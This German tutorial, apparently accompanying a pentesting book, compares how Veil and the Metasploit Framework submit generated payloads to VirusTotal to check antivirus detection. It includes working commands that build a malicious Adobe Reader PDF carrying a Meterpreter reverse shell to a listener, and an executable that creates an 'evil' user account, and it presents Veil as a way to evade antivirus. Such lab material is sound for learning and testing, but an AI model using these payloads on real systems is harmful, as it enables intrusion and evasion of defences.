Das Metasploit-Framework und die Software Veil haben nun Möglichkeiten implementiert, selbst erstellte oder mit Schadcode versehene Dateien über den Dienst „VirusTotal“ zu untersuchen. Durch diesen Test kann geprüft werden, ob die Virenschutzprogramme der verschiedenen Hersteller die übersandte Datei als Malware einstuft oder nicht.
Die Abfrage ist unter Voraussetzung einer Internetverbindung über die Kommandozeile möglich. Dabei nutzen beide Programme die API von VirusTotal. Dabei ist eine unterschiedliche Herangehensweise bei der Übermittlung von Daten an diesen Dienst zu beobachten.
Das Metasploit-Framework übermittelt die gesamte Datei an VirusTotal und erhält eine konkrete Aussage, ob in der übermittelten Software Schadcode erkannt wurde und wie diese vom jeweiligen Hersteller bezeichnet wird. In den Nutzerbedingungen von VirusTotal ist festgelegt, dass sie diese Dateien weitergeben und verwenden dürfen. Es ist somit nicht auszuschließen, dass Daten an die jeweiligen Firmen zur weiteren Analyse weitergeleitet werden.
Die Macher der Software Veil haben einen anderen Ansatz. Sie möchten Penetrationstester die Möglichkeit geben Software zu erstellen, die von Virenschutzprogrammen nicht erkannt werden. Sie bitten daher darum, die mit Veil erstellten Dateien nicht über diese Dienste zu testen. Trotzdem haben sie eine Möglichkeit gefunden, diese Dateien ebenfalls zu prüfen. Bei der Erstellung werden ab der Version 2.2.4 nun zusätzlich Hash-Werte der angefertigten Dateien ermittelt. Anschließend ist der Nutzer in der Lage, nur diese Hash-Werte an den Dienst zu übermitteln und eine entsprechende Aussage zu bekommen.
Im nun folgenden Test sollen vier Dateien erstellt und über VirusTotal geprüft werden. Dazu werden jeweils zwei Dateien mit dem Metasploit-Framework und jeweils zwei Dateien mit Veil erstellt. Für den Test nutzen wir Kali Linux in der aktuellen Version. Am besten lassen sich diese Test in einer virtuellen Umgebung durchführen. Im Buch Kapitel 2 wird gezeigt, wie diese ohne großen Aufwand erstellt werden kann.
Veil muss noch installiert werden. Dies kann wie folgt geschehen:
root@kali32:~# apt-get update && apt-get upgrade
root@kali32:~# apt-get install veil
root@kali32:~# /usr/share/veil/setup/setup.sh
Leider installiert Kali Linux nicht immer die brandaktuelle Version der Software. Wer diese aber gleich testen möchte, kann sie zusätzlich in ein anderes Verzeichnis installieren. Grundsätzlich kann man in diesem Fall wie folgt vorgehen:
mkdir /usr/share/veil_new
cd /usr/share/veil_new
wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
./setup.sh
/usr/share/veil_new/Veil-master/Veil.py
Dateien mit Veil erstellen
Das beigefügte Video zeigt im ersten Teil, wie zwei Dateien mit Veil erstellt und im Verzeichnis /root/veil-output/compiled abgelegt werden. Zusätzlich wird die Datei hashes.txt erstellt, die SHA1 Hash-Werte enthält.
Dateien mit dem Metasploit Framework erstellen
Für den Test mit dem Metasploit-Framework nutzen wir jeweils die im Buch im Kapitel 5.6 und 5.9.1 beschriebenen Methoden. Hier wird bewusst auf ältere Verfahren zurückgegriffen. Die so erstellte Software sollte von möglichst vielen Herstellern als Malware erkannt werden. Der zweite Teil des Vidoes zeigt, wie man hier vorgehen kann. Beide Dateien werden ebenfalls im Verzeichnis /root/veil-output/compiled abgelegt.
Beispiel 1 – Schwachstelle im Adobe Reader (Seite 154-157)
Wir erstellen uns folgende Ressource-Datei und speichern sie unter /home/fileformat.rc ab:
use windows/fileformat/adobe_utilprintf
set FILENAME file03_m.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.11
set LPORT 80
exploit
cp /root/.msf4/local/file03_m.pdf /root/veil-output/compiled
Die PDF-Datei wird dann mit den folgenden Befehlen erzeugt und in das Veil-Verzeichnis kopiert:
msfconsole –r /home/fileformat.rc
Beispiel 2 – Nutzerkonto auf dem Zielsystem anlegen (Seite 170)
msfpayload windows/adduser pass=SecretPassw0rd user=evil x > /root/veil-output/compiled/file04_m.exe
Da das Metasploit-Framework automatisch keine Hash-Werte erstellt, müssen wir dies nachholen und die Ergebnisse manuell in die Datei hashes.txt einfügen.
cd /root/veil-output/compiled
sha1sum file03_m.pdf >> ../hashes.txt
sha1sum file04_m.exe >> ../hashes.txt
Bemerkung: Die Datei hashes.txt sollte nun mit einem Testeditor angepasst werden. Leider wird der Doppelpunkt (:) nicht richtig gesetzt. Möglicherweise hat dies auch keine Auswirkungen. Wir ändern es trotzdem.
Die Datei hashes.txt sieht dann wie folgt aus:
root@kali32:~/veil-output# cat hashes.txt
bd28998efca0bb774f505f6d077c9215eba2762c:file01_v
acfeccb72c8d3900d06ea0225a38baded5309024:file02_v
9a0c83e4247ed23e7d885cb3c2486b650157782c:file03_m.pdf
993b16ad840652eae3f247b6dccef13e70ecf662:file04_m.exe
Dateien mit Veil bei „Virustotal“ prüfen
Veil hat ab der Version 2.2.4 einen neuen Menüeintrag (checkvt) bekommen. Dieser muss nun einfach aufgerufen werden um die in der Datei hashes.txt gespeicherten HASH-Werte bei VirusTotal zu testen
Dateien mit dem Metasploit Framework bei „Virustotal“ prüfen
Das Matasploit-Framework kann man ein zusätzliches Skript im Verzeichnis /usr/share/metasploit-framework/tools finden.
cd /usr/share/metasploit-framework/tools
./virustotal.rb –h
Usage: ./virustotal.rb [options]
Specific options:
-k <key> (Optional) Virusl API key to use
-d <seconds> (Optional) Number of seconds to wait for the report
-q (Optional) Do a hash search without uploading the sample
-f <filenames> Files to scan
Common options:
-h, --help Show this message
Mit der Option –f kann man bis zu 4 Dateien gleichzeitig bei VirusTotal prüfen:
virustotal.rb –f “file01_v.exe file02_v.exe file01_m.pdf file01_m.exe”
Schlussfolgerungen
Veil kann nur feststellen ob die Datei schon mal zu VirusTotal hochgeladen wurde. Das war im Video mit der Datei file01_v.exe der Fall.
Mit dem Metasploit-Framework wird die Datei tatsächlich hochgeladen und durch die verschiedenen Virenschutzprogramme geprüft. Man erhält ein detailliertes Ergebnis.